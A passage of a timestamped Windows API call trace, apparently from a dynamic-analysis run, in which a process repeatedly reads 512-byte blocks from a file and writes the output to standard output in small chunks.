lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] GetFileType (hFile=0x50) returned 0x1 [0194.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.790] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.790] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.790] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.791] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] GetFileType (hFile=0x50) returned 0x1 [0194.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.791] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] GetFileType (hFile=0x50) returned 0x1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.792] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.792] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.792] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.793] GetFileType (hFile=0x50) returned 0x1 [0194.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.793] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.795] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.796] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.796] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.796] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] GetFileType (hFile=0x50) returned 0x1 [0194.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.797] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.797] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.797] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.798] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.798] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.799] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.799] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] GetFileType (hFile=0x50) returned 0x1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.799] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.800] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.801] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.801] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.801] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.802] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.802] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.802] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType (hFile=0x50) returned 0x1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.803] GetFileType 